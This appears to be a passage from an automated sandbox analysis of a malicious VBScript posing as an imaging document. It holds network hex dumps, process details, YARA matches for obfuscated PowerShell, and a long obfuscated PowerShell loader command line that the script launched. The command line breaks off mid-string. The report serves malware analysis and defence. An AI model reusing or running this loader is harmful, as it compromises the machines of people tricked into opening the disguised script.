2023-03-02 16:19:42 UTC	436	IN	Data Raw: 36 ca 6a 7c 7a bb 0c bc a8 22 1d e8 b0 68 14 cc 9a ba 02 c0 7d 4e f8 d1 5c 49 34 bb d9 a8 af 36 9e 59 a4 30 f7 4c 4e 20 de c5 55 a6 97 3b d0 f6 eb 11 29 2e a8 5b be a8 7d 92 00 4e 5f cc db 79 56 e3 c9 c8 82 eb 04 69 63 51 3b ec 9b 66 04 df db 9c b7 67 dc 2f 33 b6 a5 d9 1b f8 6d 06 9d 79 46 ba c8 50 18 85 c4 7b 8b 53 d7 20 b7 bb a5 44 21 84 ae e3 29 db 4d 83 58 9f 88 db 05 3e b0 5d be 4d a3 30 4c 10 3f f1 64 ea 07 25 86 6d 19 a2 c7 a1 d9 c4 80 75 cb 2d ba c9 b9 f6 7f 28 14 5e b8 b5 c1 5b b6 97 e2 fc 8e f7 b1 6c 93 2f 47 00 ca 2c 40 6c a8 e7 68 ec 3b e7 6c de 81 1e a2 92 4b 40 4a 33 64 69 70 41 fc e5 d6 3a 41 ba 56 f4 dd 4f 76 83 98 4d e0 d6 71 28 52 11 84 04 ce eb 1b 7b 28 8f 0a cd 69 0b eb 30 15 41 89 dc 1d 13 46 5c cc 1d ab 34 6f d7 73 98 39 71 59 46 0e Data Ascii: 6j\|z"h}N\I46Y0LN U;).[}N_yVicQ;fg/3myFP{S D!)MX>]M0L?d%mu-(^[l/G,@lh;lK@J3dipA:AVOvMq(R{(i0AF\4os9qYF
2023-03-02 16:19:42 UTC	437	IN	Data Raw: b3 d3 d1 4f b7 3f d8 51 cb e8 c9 d3 f5 0e 11 4c e2 fd f2 e7 5f a5 ce a8 d4 94 f7 90 2f 03 bc 90 4f ea 18 66 96 33 01 c8 c3 75 57 d3 d6 06 4a 98 af e9 0a c1 43 c6 1b 2c f5 44 98 97 ad 15 e5 e9 6c 6f 5a 93 98 a3 f8 b9 24 fd 6c 4a 58 77 4a ad 0c fd a5 d3 28 0d c7 3c 7a 24 b0 56 19 e6 92 29 89 f8 33 5c 3a 7e 81 93 2f 95 20 c0 94 e8 b5 35 4c e0 dc 7b c6 fb ce d7 10 69 1c d8 9f 5c 3a 72 35 93 1f 2c 7e dd 82 86 47 86 46 79 9e 25 90 f1 40 e4 a3 27 c3 f0 43 8e e2 a1 ab cd d5 18 70 bd 5b 80 66 16 52 7c 52 31 e3 7e 8f 3a 76 01 3c 7a c2 5f f6 5c 52 2f 4a e5 b1 9d b6 46 d4 3a d2 38 38 08 5b 4f cb 2c 4b 28 38 fc 9c 9a 0d 90 c7 06 95 a4 93 fe fe 14 c8 66 36 32 3f 47 6d c2 da c7 5a cb 1e 15 75 b9 40 a2 8c 95 e6 a1 e7 3a 3b 44 6b b9 52 a5 b6 95 01 45 42 3b 36 d4 af c0 6e Data Ascii: O?QL_/Of3uWJC,DloZ$lJXwJ(<z$V)3\:~/ 5L{i\:r5,~GFy%@'Cp[fR\|R1~:v<z_\R/JF:88[O,K(8f62?GmZu@:;DkREB;6n
2023-03-02 16:19:42 UTC	439	IN	Data Raw: 19 34 42 17 56 bd 95 50 38 44 c2 4b 06 ef ee 31 1c 61 58 2e c2 6f 5d 21 fe fb c6 64 26 85 bc c8 70 16 90 1e 1d 2f f2 53 f0 0f 9f b7 13 2b 25 c4 af 99 9f 6b 4c c5 77 6a 6b 3b 0b 2c e8 44 21 7f 03 e8 24 d2 f0 2f 06 6b 3e 51 06 14 d4 32 3b f1 61 89 db ca 67 d2 a0 1c 2f d1 9e 3e 40 90 d4 92 12 ce f2 f9 37 ad 52 f2 52 34 91 24 58 62 80 74 77 e0 04 0f 63 65 db a0 ae 62 8b ea 94 e0 ba 1e 2c 7c f0 7e 32 46 09 96 61 ad f4 87 ee b5 93 68 51 3c b7 ac 13 b8 94 db ea 2e 18 ea 50 a7 13 53 8a 10 48 47 c2 00 a4 80 e3 c2 5a 15 47 97 b4 e6 54 d8 a0 9b 64 91 26 c0 7d 70 45 bc a3 14 23 9b 2d 79 fc 69 f6 5a 89 a1 41 1c 1b db d9 b8 4e c7 51 68 6c 9f fb dc 97 17 44 85 ec ed ed 76 d1 1f 19 c8 49 3d 84 af 0d fc ef 00 9b 6c 25 4e 61 b6 cb aa fd 6c ef a1 9a 07 3f 1b bb 6d 79 b9 26 Data Ascii: 4BVP8DK1aX.o]!d&p/S+%kLwjk;,D!$/k>Q2;ag/>@7RR4$Xbtwceb,\|~2FahQ<.PSHGZGTd&}pE#-yiZANQhlDvI=l%Nal?my&
2023-03-02 16:19:42 UTC	440	IN	Data Raw: 0d 73 8c c4 da f1 1a 3a 26 4d 57 50 7c 33 8b d4 c0 c4 2f 59 25 1a 8f 77 1b c0 e5 2c 18 07 2b 5b 7f c3 72 87 d8 8a 3a 60 4e a5 28 46 59 7f 70 16 22 64 6a 90 53 19 69 ab f9 0e 4f f1 5b 09 a0 7a a0 a7 e4 30 1b f5 09 68 56 64 3c 45 56 87 ef a3 90 70 15 b3 a7 a7 75 b7 24 fb 8a d6 40 9d 30 e3 6b ac 2c 70 13 87 14 bc b7 c6 d4 22 a5 53 90 b2 f8 61 22 80 8f f6 4b 74 35 82 cc 85 e7 ba 8e bc 00 da bc 76 e6 88 3e a7 f1 71 85 05 0b eb fe f7 c3 56 fb 2c c5 39 b6 3f 10 39 cb ec 6c ee 4d 8b 8f b3 0d 26 67 e9 1b 97 19 8f 12 93 41 1f ad f2 d5 d7 7d d3 4a 74 c8 3e 25 85 e2 1f 15 ee c6 50 29 19 27 c6 25 f0 c2 92 8c 74 95 d6 Data Ascii: s:&MWP\|3/Y%w,+[r:`N(FYp"djSiO[z0hVd<EVpu$@0k,p"Sa"Kt5v>qV,9?9lM&gA}Jt>%P)'%t

Chrome Debug Log

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exePID: 6128, Parent PID: 3452

General

Target ID:	0
Start time:	17:18:04
Start date:	02/03/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GlobalImagingDocuments9575734549684.vbs"
Imagebase:	0x7ff7b2e80000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.263614790.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.263715508.0000026B17243000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.267192402.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.265026295.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.263614790.0000026B1723E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.266039874.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.266239984.0000026B1721D000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.265922370.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: SUSP_LNK_SuspiciousCommands, Description: Detects LNK file with suspicious content, Source: 00000000.00000003.253488505.0000026B17201000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.265270839.0000026B17307000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000003.265653737.0000026B17357000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000000.00000002.266860344.0000026B15502000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5496, Parent PID: 6128

General

Target ID:	1
Start time:	17:18:10
Start date:	02/03/2023
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aFR3T5P0BFT0B1H4FAf4V6M2S8M0S3N1F1I3P5E0BAa0B9I1C2B4RAG4T6O3M0I0pFb1D4S1V2B1P3D0V7S0SAp'U;S`$JSjpMrZgCeE4Y=GCNraoUubpSiOeFrSsArG0A2K A'f3S0C0KFu1O4A1I2L1A3A0S7O0kAS2K7C0OAA0MAH0B9B0B5T'A;S`$ISUpPrbgSeP5D=PCLrGoRuSpIiBeMrEsHrH0f2I B'F0S8N1l2T0C2K0SAp0AAP's;T`$MSppSrBgNeP6s=FCBrDoSuHpkineUrRsVrT0A2U S'G2S8O1S2B3H6S1B4G0D9c1b2T0I3F0B5E1o2I3I0A0AFb1n4F1I2U1P3S0G7D0NAs2UBS0D3N0TBu0o9S1F4F1UFK'H;B`$rSFpSrGgSem7E=HCtrIoUuFpCiMesrTsJrQ0S2S B'S2PFD2B3A3MEK'T;S`$ASLpgrHgBeD8p=MCBrSoUuApliSeFrEsGrR0F2R T'C3FAH'U;i`$NFRrMeBkCvSeMnHsDsR=PCDrBoBuFpAiSefrAsFrG0G2P O'I3S3S3f5P2I3S3N4A5R5R5S4A'U;R`$BHIeBmRaOtSoGpDaStC=HCSrDoUuSpPiMeSrjsUrE0S2U S'I2E5K0H7B0FAA0sAr3C1S0mFR0D8P0S2M0V9E1P1i3P6U1P4M0D9D0R5A2T7H'V;SfFuFnFcltOiBoPnT HfSkSpn F{NPLaRrUaUmI B(a`$BFLoTrutPrAnGgA4K9H,S U`$DFSjPaIsFeNnMdOem)I A B S T e;S`$FFUoBrFtBhP0A I=LCBrVoNuSpSiReDrUsPrG0T2C L'S4F2F0A4U1U4D0P7D0A5t0E3A1R4P1rFW0UDS4e6U5MBS4G6P4BEL3KDU2D7j1G6U1E6A2F2B0p9A0MBG0T7U0mFT0K8D3BBK5ECB5MCF2P5r1F3r1B4H1R4E0X3F0L8H1A2C2O2L0S9U0RBN0D7u0UFV0S8p4U8A2N1s0H3O1P2A2F7b1F5A1T5I0F3R0XBR0A4R0GAh0VFH0T3M1G5H4DEK4NFR4C6B1OAB4E6S3S1D0NEQ0s3A1s4a0S3K4DBp2T9A0b4b0UCI0M3H0G5B1H2D4C6F1gDD4G6F4A2F3P9C4S8D2O1a0PAr0U9B0M4S0A7V0AAH2H7O1a5L1T5S0I3R0MBS0B4U0BAP1sFP2F5V0U7F0G5F0zEU0T3D4S6D4BBH2P7D0A8B0V2E4E6J4D2D3D9F4A8A2BAM0W9R0v5S0N7o1S2f0HFF0O9B0D8S4E8B3l5d1A6D0UAG0SFH1M2U4EEP4V2G3A5F1L6P1S4P0U1M0K3B5BEK4UFS3TDD4SBE5L7n3DBB4A8P2S3A1S7m1F3T0I7R0RAf1M5A4REC4G2A2I4S0L9O1D3m0E1P5C6p4OFm4D6f1SBF4EFL4M8B2U1G0M3D1J2U3L2L1DFH1T6M0C3P4UES4M2M2F4S0V9S1P3B0C1I5B7F4PFF'W;F&T(P`$HSMpTrFgFeK7J)D G`$PFMoCrMtUhI0H;A`$KFSodrBtRhH5b F=D BCFrKoSuMpHiAeSrJsMrU0I2P P'B4R2D2D7K1N5D1C2M0G3C0Z8N0JFS1I5F0NBS4T6O5LBT4S6m4K2H0P4U1P4S0A7S0F5H0B3H1T4S1BFD0CDO4P8I2E1M0N3G1D2F2UBS0a3C1T2V0rEP0O9r0N2S4EEa4D2M2K4K0A9U1N3V0O1D5G4S4FAP4B6C3MDP3F2P1SFS1S6S0R3A3LDP3ABN3CBC4D6L2O6C4OEB4P2F2B4M0L9A1F3G0m1W5l5S4SAp4B6M4c2D2p4T0M9F1R3F0A1P5S2T4AFN4CFA'I;I&D(M`$USHpMrEgJee7B)G E`$NFToErMtAhB5B;L`$KFEoBrTtChF1S D=F TCPrRoGuMpSiSePrFsnrT0U2B B'G1O4b0A3D1B2B1B3M1F4C0A8S4S6J4A2K2T7A1S5M1A2T0k3T0B8K0mFp1C5S0LBR4V8g2EFS0S8S1S0P0B9F0ADT0R3U4CEB4l2B0S8M1M3B0AAF0MAB4NAO4S6N2B6G4UEu3UDU3H5P1KFV1k5K1H2R0M3s0RBQ4S8V3T4g1F3T0K8P1s2U0NFS0MBC0c3K4M8M2CFB0E8v1K2K0T3K1O4T0E9N1B6H3P5S0K3C1R4E1O0J0GFS0W5A0D3B1C5F4s8I2EEN0T7P0L8B0B2R0SAr0T3F3K4G0P3p0a0B3PBJ4DEP2L8E0P3N1T1R4TBS2N9H0F4K0aCT0A3S0F5F1A2C4M6P3C5P1FFO1D5B1i2T0M3P0SBI4T8B3E4O1T3U0P8S1C2F0CFS0MBb0O3B4D8r2SFP0d8R1M2B0F3R1H4N0F9M1A6S3S5T0W3E1E4C1C0T0HFO0H5H0i3H1I5R4n8F2SEA0J7B0L8A0L2S0HAP0S3K3g4B0P3O0N0F4GEP4TEM2R8S0A3E1S1G4FBd2R9G0F4P0MCS0F3V0T5C1S2T4p6R2MFC0F8J1S2U3V6B1T2A1D4A4UFT4AAN4S6M4REB4G2C0u4O1T4A0D7D0S5F0m3M1U4H1WFC0PDb4d8m2A1N0E3M1U2I2RBR0E3A1C2B0DEG0O9N0C2B4IEK4M2e2D4T0N9U1A3P0M1S5R3C4WFR4OFF4S8B2WFC0W8e1N0E0P9D0SDB0P3N4HEF4P2U0G8R1G3S0KAS0BAD4VAA4U6s2F6b4UEA4H2N2P0H0B9P1R4K1E2S1S4L0A8U0T1I5S2F5PFS4VFK4RFD4BFA4SFF4dAA4H6W4F2L2D0O0UCH0n7G1S5W0G3T0U8D0K2R0F3S4uFS4SFA'T;s&B(K`$BSapUrKgSeG7I)D H`$FFaoGrAtDhM1H;S}TfPuOnScGtgiBoAnS DGVDDTh E{GPaaTrAaCmA L(A[APmaGraaAmaeUtIeTrT(OPsoMsSiCtaiGoPnI L=S B0n,F GMPaKnAdSaFtBoSrGyF V=S M`$TTlrtuTeb)A]A F[RTCyDpVeK[C]E]M D`$pSPuFpPeErMbfrNuFgCeM4S2T,C[SPTakrCaAmieUtWeJrd(KPsoGsCiCtDiLobnG T=c A1E)F]T D[NTFyCpFeW]S B`$SOHbHjCeScHtWeU R=D I[UVuoTiFdS]E)B;C`$FFFoFrStIhH2B S=F NCDrVoDuPpkioeTrAsLrK0O2A H'O4A2T3B5F0k3l0DBK0FFU0M5K0U9M1A2S1T2P0A9H4N6F5ABA4P6P3CDM2U7S1L6T1B6T2L2D0P9N0sBU0T7F0PFG0C8S3PBX5OCC5RCB2B5A1F3B1g4A1k4H0K3S0I8S1M2M2D2N0E9S0hBF0P7S0FFS0j8S4S8N2K2E0I3M0L0P0RFu0H8E0I3E2O2H1bFU0P8R0N7H0SBV0tFH0M5M2S7M1S5S1R5C0D3T0SBU0F4P0BAB1RFF4UEA4SEs2F8T0V3B1D1A4CBU2b9P0U4S0FCA0F3S0U5J1U2U4I6S3S5S1FFS1C5S1f2S0N3b0KBp4L8s3K4L0R3A0S0S0BAA0S3v0A5O1F2G0SFR0T9H0S8F4Z8B2a7M1A5F1B5Y0R3R0PBT0F4o0iAA1GFA2A8P0F7A0bBA0G3A4SET4I2F2N4R0P9D1I3F0V1V5AEe4IFM4PFD4UAS4K6K3FDR3p5B1OFE1C5H1a2U0T3S0sBH4F8B3b4F0U3I0M0B0WAF0H3K0G5S1U2U0LFN0A9B0A8G4S8P2P3P0aBD0HFf1J2D4M8H2T7F1F5A1S5I0c3U0DBS0g4i0MAI1HFS2R4T1K3A0UFT0GAe0C2U0P3U1R4B2F7d0N5J0u5M0G3S1U5W1t5R3ABS5SCM5RCG3T4R1M3J0O8L4EFM4S8M2e2m0B3S0E0F0HFC0U8O0K3E2B2U1AFM0A8g0B7S0BBL0oFT0B5C2UBP0G9K0B2M1B3O0FAS0O3E4SES4G2P2G4V0S9A1M3S0S1e5KFD4DAW4Z6L4D2S0D0d0R7S0rAb1A5G0J3T4JFD4C8o2D2S0V3T0b0O0lFA0B8T0A3P3F2M1BFS1P6T0V3R4IET4A2g3B5K1A6N1C4S0A1O0S3M5M6F4DAT4r6H4U2O3H5D1m6D1V4L0A1S0F3K5M7K4sAT4R6b3FDn3S5G1VFM1C5T1J2c0B3M0CBR4B8S2NBF1H3N0MAb1O2L0HFE0S5S0C7A1R5W1O2B2E2K0m3g0LAo0S3S0O1S0C7O1P2I0b3R3FBE4FFW'C;H&S(u`$SSVpSrSgNeD7l)n C`$IFsoUrstAhU2C;C`$FFPoVrDtChS3S U=R GCLrnoLuWpUiKePrBsErL0s2A N'U4T2T3O5E0B3T0ABU0BFM0T5g0F9i1L2S1R2T0V9S4Y8G2P2S0I3F0J0R0AFL0I8S0O3H2U5A0D9f0a8Y1B5D1P2B1t4S1R3H0O5D1S2S0I9J1F4V4IES4L2R2T4D0B9a1S3U0Z1D5K0C4NAR4N6T3EDS3W5I1MFU1I5N1N2M0A3S0HBA4I8C3N4r0b3O0R0M0GAL0S3T0E5g1S2M0PFT0U9o0t8N4N8T2D5L0S7a0SAa0SAD0OFP0F8S0d1U2h5S0B9L0H8K1F0P0S3S0M8S1I2b0aFA0S9C0M8D1S5L3DBE5BCR5UCL3L5D1E2V0S7B0M8K0L2K0A7A1A4S0d2S4uAA4G6S4M2B3U5A1p3U1C6S0H3G1M4N0V4S1P4v1s3A0P1S0S3S5C2G5O4A4MFm4S8R3O5C0M3c1H2V2RFE0FBK1W6P0KAE0K3C0TBa0I3B0L8b1U2R0D7T1U2R0IFA0C9M0A8W2B0A0AAA0G7N0Y1A1B5A4MET4S2A2G4b0A9L1L3K0S1H5T1P4UFA'I;K&E(F`$OSTpvrSgPeL7H)b S`$PFAoMrPthhI3P;A`$SFSoSrCtShO4C R=U sCSrKoHuUpRiPeErHsSrM0V2U R'D4V2S3E5o0L3F0rBU0MFA0F5V0I9b1A2S1o2B0M9C4K8s2S2g0s3T0S0A0HFT0F8U0s3S2DBV0T3P1S2R0BEV0F9F0B2A4BEP4A2B3A5h1I6P1D4T0I1M0K3A5S4N4BAS4I6A4K2B3M5i1K6m1B4A0T1I0H3O5R5P4LAE4F6U4T2M2K9I0D4T0PCD0T3B0P5N1V2M0B3B4VAD4U6M4A2E3S5f1F3G1C6M0H3T1H4G0C4B1P4b1v3T0A1F0S3T5H2U5E4P4nFD4B8F3S5P0P3F1P2E2DFS0fBS1s6U0FAD0P3C0EBI0L3E0N8E1U2M0R7B1T2S0BFS0l9Q0B8S2B0P0MAS0A7T0T1C1D5E4LES4A2C2A4P0o9M1G3t0K1h5T1M4PFP'S;D&s(C`$FSIpUrBgAeU7S)E e`$mFooBrUtghU4T;k`$UFTocrGtShL5D B=D TCsrRoSuNpBiSeRrusFrT0X2s S'N1O4S0m3W1M2C1T3H1L4U0C8M4B6E4U2R3i5P0R3U0ABA0SFA0S5N0P9S1B2C1P2U0U9N4R8A2P5T1K4B0m3P0V7G1I2t0A3S3B2A1SFA1N6F0C3I4HEf4iFS'B;S&C(s`$FSTpHrFgSeD7P)O t`$AFToDrDtDhL5T a P H;P}D`$EAGcRuKtSiBlAiG P=B ACArSoUuPpBiPeDrtsGrA0P2D k'G0FDM0o3H1S4C0r8M0p3B0HAK5U5T5L4A'P;H`$LFRoPrMtAhT6T B=L PCFrOoBuMpfiSeLrFsBra0V2A D'S4D2K2P4B0O7M0IAp0ODH0S7f0S8P0HFU1B5P0W3L1J4M4D6H5sBN4F6G3ADV3P5C1AFA1l5I1K2F0U3W0EBH4A8S3A4A1B3F0K8S1S2U0DFH0RBD0B3F4R8S2SFU0S8R1b2S0C3A1k4H0S9R1A6E3T5K0L3V1P4N1O0R0VFD0D5R0K3S1P5M4S8Z2uBS0T7U1c4T1L5P0FEe0S7I0mAT3pBV5MCH5SCB2N1F0S3D1A2M2O2P0T3L0BAF0V3h0F1H0F7S1K2G0M3C2A0F0E9A1k4N2U0M1F3S0B8D0B5C1E2F0PFE0G9L0r8I3D6H0S9U0IFK0S8P1C2B0T3B1M4L4GES4VEb0D0S0PDB1s6B4S6K4P2A2N7S0U5P1I3B1G2A0LFP0jAb0MFS4G6S4F2A3l5M1H6A1D4T0S1R0D3M5S2A4RFc4DAE4W6M4LEE2S1S2M2b3A2P4K6R2D6B4AEB3SDE2GFU0R8D1P2O3d6T1T2E1R4T3BBS4EAK4Y6A3BDX3S3C2TFP0k8C1e2M5A5N5F4F3MBO4NAD4S6K3VDS3p3C2NFO0R8U1S2K5B5M5F4H3SBD4PAL4F6M3BDM3h3S2UFH0M8B1T2I5D5S5o4F3oBH4PFH4B6K4EEU3CDG2UFs0T8s1R2O3B6S1R2m1T4A3EBT4GFS4cFT4LFM'G;C&C(O`$FSUpOrGgRem7S)T M`$RFKoArMtShS6M;L`$UMOiUdIsSoAmEma s=D VfTkIpW M`$HSjprrIgBeK5R F`$SSDpSrSgOeP6R;G`$OFToCrWtEhC7I D=U MCSrAoUuApAiIeArTsGrm0P2H C'd4R2p3B4M0T9G0U7S0B8F0B9C0CDA0D3D1F6A1U4C0A3C5S5M4P6K5ABT4F6L4B2K2T4G0S7K0RAN0SDR0O7O0M8P0UFH1U5B0D3G1F4S4T8E2GFS0D8U1f0W0n9A0ADE0D3e4UEh3UDJ2SFI0F8A1C2D3S6S1W2A1V4S3hBF5SCv5LCK3pCk0E3S1L4N0B9b4BAT4L6U5S0T5S2U5t5S4TAI4A6U5T6i1YEB5G5U5H6U5S6M5D6C4PAT4B6F5V6C1IED5L2F5G6D4iFP'P;s&P(H`$PSSpSrGgaeA7C)N G`$TFLoBrGtMhB7U;C`$CFSoWrDtThc8V r=h ACLrBoCuRpRiheFrAsUrC0B2P s'G4A2s3H5F1OFF0T2G0L7U0PBV0T3R1r4A0fFE0sDA4P6S5sBD4S6E4M2A2B4T0R7U0OAM0EDB0C7C0z8A0AFE1D5D0M3G1S4s4B8I2KFS0I8S1M0A0K9E0FDf0E3L4UEE3FDE2aFC0S8G1d2s3V6W1P2D1I4d3sBH5gCI5SCN3NCE0H3N1S4F0A9c4DAA4P6B5B3C5PFA5F6I5H0B5K6S5F4T5L4U5F2R4AAB4P6K5T6H1PEU5I5S5C6C5A6A5B6C4JAs4S6W5A6R1CEA5R2g4AFK'S;A&Y(K`$PSgpMrNgQeK7F)K e`$SFUoRrPtShS8C;R`$SCrrPoPuNpJiAeDresSrH0R1V I=t ACTrAoUuSpCiBeCrSsNrL0T2I S'P0cEa1C2C1S2G1S6M1g5s5BCV4u9S4S9O0S2C1P4L0fFS1P0I0d3T4P8D0D1W0D9L0C9F0T1U0NAM0L3S4T8D0F5N0S9B0RBV4t9D1I3o0E5R5D9S0T3B1IEN1U6g0E9D1D4u1F2K5SBs0J2D0S9G1N1B0U8R0DAU0T9o0A7K0L2U4H0p0FFD0P2O5PBL5O7N2DFI1P3s0PFG0P5P3FCF3S9C5FED1K0B3W7C2C3W5KFA0G2P3S3O5F2V0S4h0M0U1sEO5B5G5f2R2FBR1I4C3S5I2CAV2F0D2Y7O0BES2DEA0v7F2PAf1B5s5B7R0BAO'H;j`$FCSrLoSuCpKiBePrCsAro0s0t B=S 